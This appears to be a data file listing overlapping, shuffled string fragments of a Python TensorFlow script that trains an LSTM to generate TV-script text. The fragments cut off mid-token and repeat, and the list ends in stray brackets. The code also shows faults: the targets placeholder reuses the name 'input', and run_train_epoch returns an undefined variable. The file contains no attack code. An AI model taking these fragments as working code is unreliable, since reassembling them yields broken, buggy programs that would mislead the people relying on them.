"+ token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(')",
"1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i",
"train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs):",
"sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far",
"Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad,",
"cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size)",
"all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1)",
"epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in",
"{}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every ==",
"tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor)",
"[None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self,",
"= tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]]))",
"{self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script",
"print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences =",
"loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from =",
"all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for",
"self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None)",
"Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) #",
"initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = '",
"input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell,",
"# Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for",
"self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def",
"self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) #",
"dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text:",
"tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding =",
"Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word",
"to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir,",
"Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost =",
"to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length):",
"gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items():",
"timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x,",
"self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}',",
"# Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost",
"= optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches,",
"loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities,",
"(epoch_i % save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir,",
"def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size =",
"return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell",
"cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell,",
"return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor,",
"#print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i",
"None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size,",
"(epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far",
"= tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model",
"gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in",
"to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i %",
"os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word,",
"= self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits,",
"range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed",
"state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary =",
"= tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs,",
"(multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1))",
"'.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if key in",
"= self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state)",
"NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None,",
"= tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0),",
"test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text:",
"num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess:",
"tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text,",
"prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input",
"= ' ' if key in ['\\n', '(', '\"'] else '' tv_script =",
"key, token in token_dict.items(): ending = ' ' if key in ['\\n', '(',",
"estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i",
"if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1): test_final_state,",
"as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork():",
"seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets =",
"for batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y,",
"tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\")",
"train_loss = {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i +",
"os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input =",
"for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y)",
"= self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length)",
"* layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data,",
"input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def",
"multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state)",
"epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish",
"p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm]",
"tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' '",
"-1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell,",
"[[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state",
"embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state =",
"datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss =",
"# Remove tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending",
"gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word))",
"name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost)",
"get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\")",
"timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from",
"'' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n')",
"loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from,",
"= sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input =",
"= { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _",
"y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr:",
"prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with",
"= tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate =",
"word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run(",
"self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess,",
"var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer",
"dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction",
"name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)",
"[None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\")",
"os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input",
"0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if",
"return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)",
"int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text,",
"batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time",
"== num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state,",
"':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input",
"[prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): #",
"build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab)",
"% test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs =",
"print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}'",
"state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed =",
"vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected =",
"= loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return",
"estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{}",
"1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs,",
"optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate,",
"sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text:",
"int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every,",
"'\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n",
"save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory)",
"sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory):",
"fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph()",
"self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer =",
"saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory)",
"= seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr)",
"logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient",
"class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32,",
"train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph)",
"Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get",
"(x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state,",
"tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph =",
"= optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients]",
"= len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state =",
"dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data,",
"total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) -",
"1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated",
"self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for",
"epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph,",
"vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function",
"for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in",
"= [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities,",
"tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32,",
"vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected',",
"as tf import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL']",
"= tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return",
"= self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print(\"*********************************************************************************************\") print(tv_script) print(\"*********************************************************************************************\")",
"rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr",
"layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words",
"np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word",
"tensorflow as tf import timeit import datetime import numpy as np import os",
"' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if key",
"= [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients)",
"def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def",
"token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph)",
"== 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1)",
"def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if",
"save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i ==",
"len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state:",
"print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state",
"save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train",
"inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs,",
"= tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm",
"batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as",
"timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs *",
"+ 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {},",
"train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary",
"print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer()",
"var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph)",
"self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits,",
"text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches",
"with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches)))",
"cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return",
"pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for",
"{:.3f}, time so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs,",
"epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory))",
"self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time",
"p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] *",
"self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping",
"summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr =",
"tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var)",
"final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected,",
"['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script",
"capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op =",
"self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print(\"*********************************************************************************************\")",
"in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def",
"activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph",
"p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets,",
"sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word]",
"saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state,",
"(outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size)",
"{}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating",
"= loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from",
"self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count)",
"total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish",
"def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new",
"initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return",
"= tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def",
"not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self,",
"tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count,",
"dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script =",
"learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer())",
"= len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input,",
"1) if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1):",
"{:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i",
"'(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return",
"' ' if key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace('",
"with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text)",
"in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length"
] |
[
